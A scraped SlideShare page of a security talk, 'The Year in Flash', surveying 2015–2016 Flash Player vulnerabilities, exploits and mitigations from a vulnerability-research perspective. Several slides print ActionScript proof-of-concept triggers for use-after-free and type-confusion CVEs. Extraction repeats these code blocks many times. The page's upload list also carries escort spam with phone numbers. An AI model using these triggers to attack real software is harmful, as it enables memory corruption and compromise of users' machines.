Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldPriyanka Aash
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksPriyanka Aash
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Priyanka Aash
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Priyanka Aash
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Priyanka Aash
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsPriyanka Aash
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security GovernancePriyanka Aash
 

More from Priyanka Aash (20)

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOs
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdf
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdf
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdf
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdf
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
 
DPDP Act 2023.pdf
DPDP Act 2023.pdfDPDP Act 2023.pdf
DPDP Act 2023.pdf
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdf
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdf
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdf
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdf
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 Battlefield
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware Attacks
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security Governance
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 

Recently uploaded

WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...gurkirankumar98700
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 

Recently uploaded (20)

WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 

The year in Flash

  • 1. The Year In Flash The year in Flash bugs, exploits and mitigations Natalie Silvanovich @natashenka
  • 2. About me ● Natalie Silvanovich AKA natashenka AKA Flashtasha ● Project Zero member ● Previously did mobile security on Android and BlackBerry ● Flash enthusiast ● Reporter of ⅓ of Flash vulnerabilities
  • 4. My goal ● Bug finding is my top priority ○ Mostly code review ○ Some fuzzing (with Mateusz Jurczyk AKA j00ru) ○ 1 bug per day -> 1 bug per week ○ Flash bugs stay gone ● Analyze external bugs and exploits
  • 5. My goal ● Occasionally exploit bugs to answer questions ○ Is exploitation possible? ○ Is exploitation reliable? ○ How does X impact exploitability ● Work on mitigations (with James Forshaw and Mark Brand)
  • 6. This talk ● Attack surface ● The year in Flash ○ New bugs and bug classes ○ 0-days, 1-days and other exploits ○ Mitigations ● The future?
  • 7. Flash is ... ● AS2 -- ActionScript 2 ○ Interpreted legacy Flash Scripts with own VM ○ Reduced API set ○ Generally more bugs with lower exploitability ○ Blurry boundaries between VM and APIs
  • 8. Flash is ... ● AS3 -- ActionScript 3 ○ Modern VM with JIT and interpreter ■ Extendible ■ GC Heap / Fixed Heap ■ Optimized for Flash ○ Open source VM ○ Open and closed source APIs ○ Bugs are less dense but more exploitable
  • 9. Flash is ... ● Anticorpus ○ Functionality outside of script ○ MP4 parser, zlib, regex, image decoders, etc
  • 12. July 2015 ● Large update (36 bugs) ● Hacking Team dump ● Mitigations
  • 13. July 2015 ● Hacking Team dump contained two 0-days and two fixed bugs ○ ByteArray/OpaqueBackground -- 0-day UaFs due to valueOf redefinition (CVE-2015-0349 and CVE-2015-05122) ○ ConvolutionFilter issue shown earlier (CVE-2015-3039/CVE-2015-0349) ○ Integer overflow in Function.apply -- reported via Chromium VRP before use (CVE-2015-0387) ○ NULL pointer in BitmapData, not exploitable (CVE-2015-05123)
  • 14. CVE-2015-3039 ● Redefinition issue in ConvolutionFilter (also reported by bilou) ● AS2 allows any method to be redefined in script (monkey-patching) ● Generally native methods accept any type and convert objects with valueOf, toString, object constructor, etc.
  • 15. CVE-2015-3039 ConvolutionFilter float* matrix ... var filter = new ConvolutionFilter(...); var n = { valueOf : ts }; var a = []; a[0] = n; filter.matrix = a; function ts(){ filter.matrix = [1]; } var filter = new ConvolutionFilter(...); var n = { valueOf : ts }; var a = []; a[0] = n; filter.matrix = a; function ts(){ filter.matrix = [1]; } var filter = new ConvolutionFilter(...); var n = { valueOf : ts }; var a = []; a[0] = n; filter.matrix = a; function ts(){ filter.matrix = [1]; } { valueOf : ts } var filter = new ConvolutionFilter(...); var n = { valueOf : ts }; var a = []; a[0] = n; filter.matrix = a; function ts(){ filter.matrix = [1]; } [{ valueOf : ts }] var filter = new ConvolutionFilter(...); var n = { valueOf : ts }; var a = []; a[0] = n; filter.matrix = a; function ts(){ filter.matrix = [1]; } float* [] var filter = new ConvolutionFilter(...); var n = { valueOf : ts }; var a = []; a[0] = n; filter.matrix = a; function ts(){ filter.matrix = [1]; } float* [] float* []float* [] 1.0 float* [] 1.0
  • 16. July 2015 ● valueOf/toString bugs receive increased attention ○ Many similar bugs reported in next few months ○ Adobe starts efforts to pre-emptively fix similar bugs ● 33 bugs in regular update ● Vector mitigations implemented
  • 17. Vector Mitigation ● Adds checksums to Vectors that are checked before doing sensitive functions ● Some Vectors are also on their own heap page ● Reduced the reusability of exploit code ● Generally increases the quality of bug needed for an exploit ● Substitution of ByteArray or BitmapData is possible, but not as good "I don't afraid Adobe analysts at all" -- Vitaly Toropov
  • 19. CVE-2015-3130 var s = 1; var rec_array:Array = new Array(); rec_array.push({name: "john", city: "omaha"}); rec_array.push({name: "bob", city: "omaha"}); rec_array.length = {valueOf : gl}; rec_array.sortOn(["name", "city"]); function gl(){ if(s< 3){ s++; return 100000; }else{ return 2; } } var s = 1; var rec_array:Array = new Array(); rec_array.push({name: "john", city: "omaha"}); rec_array.push({name: "bob", city: "omaha"}); rec_array.length = {valueOf : gl}; rec_array.sortOn(["name", "city"]); function gl(){ if(s< 3){ s++; return 100000; }else{ return 2; } } [] [{name: "john", city: "omaha"}, {name: "bob", city: "omaha"}] var s = 1; var rec_array:Array = new Array(); rec_array.push({name: "john", city: "omaha"}); rec_array.push({name: "bob", city: "omaha"}); rec_array.length = {valueOf : gl}; rec_array.sortOn(["name", "city"]); function gl(){ if(s< 3){ s++; return 100000; }else{ return 2; } } var s = 1; var rec_array:Array = new Array(); rec_array.push({name: "john", city: "omaha"}); rec_array.push({name: "bob", city: "omaha"}); rec_array.length = {valueOf : gl}; rec_array.sortOn(["name", "city"]); function gl(){ if(s< 3){ s++; return 100000; }else{ return 2; } } [{name: "john", city: "omaha"}, {name: "bob", city: "omaha"}, {valueOf : gl}] var s = 1; var rec_array:Array = new Array(); rec_array.push({name: "john", city: "omaha"}); rec_array.push({name: "bob", city: "omaha"}); rec_array.length = {valueOf : gl}; rec_array.sortOn(["name", "city"]); function gl(){ if(s< 3){ s++; return 100000; }else{ return 2; } } var s = 1; var rec_array:Array = new Array(); rec_array.push({name: "john", city: "omaha"}); rec_array.push({name: "bob", city: "omaha"}); rec_array.length = {valueOf : gl}; rec_array.sortOn(["name", "city"]); function gl(){ if(s< 3){ s++; return 100000; }else{ return 2; } } var s = 1; var rec_array:Array = new Array(); rec_array.push({name: "john", city: "omaha"}); rec_array.push({name: "bob", city: "omaha"}); rec_array.length = {valueOf : gl}; rec_array.sortOn(["name", "city"]); function gl(){ if(s< 3){ s++; return 100000; }else{ return 2; } } int length = array->getLength(); if (array->getLength() == 0){ return; } var s = 1; var rec_array:Array = new Array(); rec_array.push({name: "john", city: "omaha"}); rec_array.push({name: "bob", city: "omaha"}); rec_array.length = {valueOf : gl}; rec_array.sortOn(["name", "city"]); function gl(){ if(s< 3){ s++; return 100000; }else{ return 2; } } var s = 1; var rec_array:Array = new Array(); rec_array.push({name: "john", city: "omaha"}); rec_array.push({name: "bob", city: "omaha"}); rec_array.length = {valueOf : gl}; rec_array.sortOn(["name", "city"]); function gl(){ if(s< 3){ s++; return 100000; }else{ return 2; } } char** s = new char*[array->getLength()] var s = 1; var rec_array:Array = new Array(); rec_array.push({name: "john", city: "omaha"}); rec_array.push({name: "bob", city: "omaha"}); rec_array.length = {valueOf : gl}; rec_array.sortOn(["name", "city"]); function gl(){ if(s< 3){ s++; return 100000; }else{ return 2; } } var s = 1; var rec_array:Array = new Array(); rec_array.push({name: "john", city: "omaha"}); rec_array.push({name: "bob", city: "omaha"}); rec_array.length = {valueOf : gl}; rec_array.sortOn(["name", "city"]); function gl(){ if(s< 3){ s++; return 100000; }else{ return 2; } } memcpy(s, array->items, length);
  • 21. August 2016 ● Many more bugs similar to HT bugs ● MC UaFs pour in
  • 22. CVE-2015-5550 (MovieClip UaFs) ● Very common AS2 bug, 100+ reported this year ○ Small variety of freed object ● Also works with TextFields ● Root cause is that display fields are freed outside of garbage collection ○ Always, for real, even if there are references (in AS2)
  • 23. CVE-2015-5550 (MovieClip UaFs) ● Happens when function parameters are converted after local variables are initialized, but before they are used ● Fixed by enforcing convert -> intialize -> use order
  • 24. CVE-2015-5550 (MovieClip UaFs) var clip1 = this.createEmptyMovieClip ("clip1", 1); var clip2 = this.createEmptyMovieClip ("clip2", 2); var n = {toString: func}; clip1.swapDepths(n); function func(){ clip1.removeMovieClip(); return "clip2"; } var clip1 = this.createEmptyMovieClip ("clip1", 1); var clip2 = this.createEmptyMovieClip ("clip2", 2); var n = {toString: func}; clip1.swapDepths(n); function func(){ clip1.removeMovieClip(); return "clip2"; } AS2 ScriptObject void* native_data void* destoy_func table* properties ... MovieClip ... var clip1 = this.createEmptyMovieClip ("clip1", 1); var clip2 = this.createEmptyMovieClip ("clip2", 2); var n = {toString: func}; clip1.swapDepths(n); function func(){ clip1.removeMovieClip(); return "clip2"; } var clip1 = this.createEmptyMovieClip ("clip1", 1); var clip2 = this.createEmptyMovieClip ("clip2", 2); var n = {toString: func}; clip1.swapDepths(n); function func(){ clip1.removeMovieClip(); return "clip2"; } SO *s = GetObject() MC *m = native_data[10]; var clip1 = this.createEmptyMovieClip ("clip1", 1); var clip2 = this.createEmptyMovieClip ("clip2", 2); var n = {toString: func}; clip1.swapDepths(n); function func(){ clip1.removeMovieClip(); return "clip2"; }
  • 26. September/October 2015 ● 23 bugs in September updates and 20 in October ○ Mostly UaFs and other redefinition bugs ● 0-day immediately after October update (reported by TrendMicro, NATO targets)
  • 27. CVE-2015-7645 ● Reported two weeks before it was found in the wild ● Type confusion in serializations, due to weird AVM behaviour ● Two other variants also reported and fixed in emergency patch ● None of these bugs compile
  • 28. CVE-2015-7645 From the AVM: // In theory we should reject duplicate slots here; // in practice we don't, as it causes problems with some existing content //if (basetb->findBinding(name, ns) != BIND_NONE) // toplevel->throwVerifyError(kIllegalOverrideError, toplevel->core()- >toErrorString(qn), toplevel->core()->toErrorString(this)); tl;dr a method can be overridden by a var Most natives don’t make assumptions, but some do. Especially interfaces.
  • 29. CVE-2015-7645 class superclass{ … public function writeExternal(){ return 1; } } class subclass extends superclass{ public var writeExternal:uint = 7; ... }
  • 30. CVE-2015-7645 From the AVM: and later: Multiname mn(core->getPublicNamespace(t->pool), core->internConstantStringLatin1(kWriteExternal)); m_functionBinding = toplevel->getBinding(t, &mn); MethodEnv* method = obj->vtable->methods[AvmCore::bindingToMethodId(info->get_functionBinding())]; method->coerceEnter(argc, argv);
  • 31. How was this bug exploited? ● Traits property array is variable-sized ● Corrupted ByteArray to get R/W access to entire memory space
  • 33. November and December 2015 ● Huge Dec update, 79 bugs, mostly MC UaF ○ Structural changes to AS2 to make broad fixes ● New mitigations ○ Checksumming on ByteArray ○ Isolated Heap ○ NOP slide mitigations ● Exploit kit 1-day and 0-day
  • 34. CVE-2015-8446 ● 1-day in Angler ● Similar to CVE-2015-5560 ● Integer overflow in ID3 allocation ○ Controllable size ○ Controllable overwrite ● Exploited using BitmapData
  • 35. CVE-2015-8651 ● Integer overflow leading to heap overflow in JIT (reported by Huawei)
  • 36. CVE-2015-8651 ● SWF contained two exploits ○ Typical vector exploit ○ Post Isolated Heap exploit including such elements as ■ Long if statements nested almost 100 times ■ Using both a media file and an image to fill heap slots at different points in the exploit ■ Triggering the bug ~600 times ■ Final results was memory space access via ByteArray
  • 38. February 2016 ● 22 bugs fixed ○ UaF straglers ○ Fuzz bugs, mostly media ○ Exception-related bugs
  • 39. CVE-2016-0985 ● Unusual type confusion in AS3 ● Occurs due to catching an exception ○ Should have been fatal error
  • 40. CVE-2016-0985 try{ var t = new TextField(); } catch(e:Error){ var t2 = new TextField(); } Assets 0001 : myFont (type font) 0002 : myVideo (type video) FFF7 : myFont1 (type font) ... FFF7 : emptyTxt (type text) try{ var t = new TextField(); } catch(e:Error){ var t2 = new TextField(); } MovieObject text* textAsset ... try{ var t = new TextField(); } catch(e:Error){ var t2 = new TextField(); } Assets 0001 : myFont (type font) 0002 : myVideo (type video) FFF7 : myFont1 (type text) ... FFF7 : emptyTxt (type text) try{ var t = new TextField(); } catch(e:Error){ var t2 = new TextField(); }
  • 41. CVE-2016-0984 ● Read-only UaF in Sound class ● Exception-related
  • 42. CVE-2016-0984 var s = new Sound(); var b = new ByteArray(); // 1000 bytes s.loadPCMFromByteArray(b, 100, "float", false, 2.0); var c = new ByteArray(); // size 2 try{ s.loadPCMFromByteArray(c, 1, "float", false, 2.0); }catch(e:Error){} s.extract(b, 1, 0); Sound char* m_pcm ... var s = new Sound(); var b = new ByteArray(); // 1000 bytes s.loadPCMFromByteArray(b, 100, "float", false, 2.0); var c = new ByteArray(); // size 2 try{ s.loadPCMFromByteArray(c, 1, "float", false, 2.0); }catch(e:Error){} s.extract(b, 1, 0); var s = new Sound(); var b = new ByteArray(); // 1000 bytes s.loadPCMFromByteArray(b, 100, "float", false, 2.0); var c = new ByteArray(); // size 2 try{ s.loadPCMFromByteArray(c, 1, "float", false, 2.0); }catch(e:Error){} s.extract(b, 1, 0); var s = new Sound(); var b = new ByteArray(); // 1000 bytes s.loadPCMFromByteArray(b, 100, "float", false, 2.0); var c = new ByteArray(); // size 2 try{ s.loadPCMFromByteArray(c, 1, "float", false, 2.0); }catch(e:Error){} s.extract(b, 1, 0); a b c ... var s = new Sound(); var b = new ByteArray(); // 1000 bytes s.loadPCMFromByteArray(b, 100, "float", false, 2.0); var c = new ByteArray(); // size 2 try{ s.loadPCMFromByteArray(c, 1, "float", false, 2.0); }catch(e:Error){} s.extract(b, 1, 0); var s = new Sound(); var b = new ByteArray(); // 1000 bytes s.loadPCMFromByteArray(b, 100, "float", false, 2.0); var c = new ByteArray(); // size 2 try{ s.loadPCMFromByteArray(c, 1, "float", false, 2.0); }catch(e:Error){} s.extract(b, 1, 0); a b c ... var s = new Sound(); var b = new ByteArray(); // 1000 bytes s.loadPCMFromByteArray(b, 100, "float", false, 2.0); var c = new ByteArray(); // size 2 try{ s.loadPCMFromByteArray(c, 1, "float", false, 2.0); }catch(e:Error){} s.extract(b, 1, 0); var s = new Sound(); var b = new ByteArray(); // 1000 bytes s.loadPCMFromByteArray(b, 100, "float", false, 2.0); var c = new ByteArray(); // size 2 try{ s.loadPCMFromByteArray(c, 1, "float", false, 2.0); }catch(e:Error){} s.extract(b, 1, 0);
  • 43. July 2015 Sep CVE-2015-5119 CVE-2015-5122 CVE-2015-5123 APSA15-03 Aug Hacking Team Oct Nov Dec CVE-2015-8651 Jan Feb Timeline Mar CVE-2016-1019 CVE-2016-1010
  • 44. March 2016 ● 22 bugs fixed ○ More fuzz bugs ■ Exploited one ○ UaFs ● pwn2own ○ 4 MC UaFs, one parsing bug in JPG ● 0-day ○ Overflow in Bitmap in platform-specific code
  • 45. CVE-2016-0998 ● Exploitable fuzz bug ● Caused by UaF check ● Required ASLR bypass ● Got around IsoHeap with JIT pages
  • 46. CVE-2016-0998 var o = {}; o.unwatch(); void* args = alloca(numArgs); … convertToString(args[0])
  • 47. July 2015 Sep CVE-2015-5119 CVE-2015-5122 CVE-2015-5123 APSA15-03 Aug Hacking Team Oct Nov Dec CVE-2015-8651 Jan Feb Timeline Mar Apr CVE-2016-1019 CVE-2016-1010
  • 48. April 2016 ● 24 bugs fixed ○ Fuzzed images ○ The UaFs continue ● 0-day ○ Reported by TrendMicro in Magnitude EK ○ Type confusion in FileReference ○ Did not work on current mitigation set (0 on free)
  • 49. CVE-2016-1019 ● 0-day vulnerability ● Reported some variants ● Type confusion in AS2
  • 50. CVE-2016-1019 AS2 ScriptObject void* native_data Type type table* properties ... FileReference char* some_prop ... var o = { toString : f }; var t = new TextField(o); function f(){ var fr = FileReference fr.call(this); } var o = { toString : f }; var t = new TextField(o); function f(){ var fr = FileReference fr.call(this); } var o = { toString : f }; var t = new TextField(o); function f(){ var fr = FileReference fr.call(this); } AS2 ScriptObject void* native_data Type type = TF table* properties ... var o = { toString : f }; var t = new TextField(o); function f(){ var fr = FileReference fr.call(this); } var o = { toString : f }; var t = new TextField(o); function f(){ var fr = FileReference fr.call(this); } AS2 ScriptObject void* native_data Type type = FR table* properties ... TextField int other_prop ...
  • 51. July 2015 Sep CVE-2015-5119 CVE-2015-5122 CVE-2015-5123 APSA15-03 Aug Hacking Team Oct Nov Dec CVE-2015-8651 Jan Feb Timeline Mar Apr CVE-2016-1019 May CVE-2016-4117
  • 52. July 2015 Sep CVE-2015-5119 CVE-2015-5122 CVE-2015-5123 APSA15-03 Aug Hacking Team Oct Nov Dec CVE-2015-8651 Jan Feb Timeline Mar Apr CVE-2016-1019 May CVE-2016-4117 Jun CVE-2016-4171
  • 53. June 2016 ● 36 bugs fixed ○ MC UaFs (echo from pwn2own) ● 0-day ○ Reported by Kaspersky ○ OOB memory access in open source parser
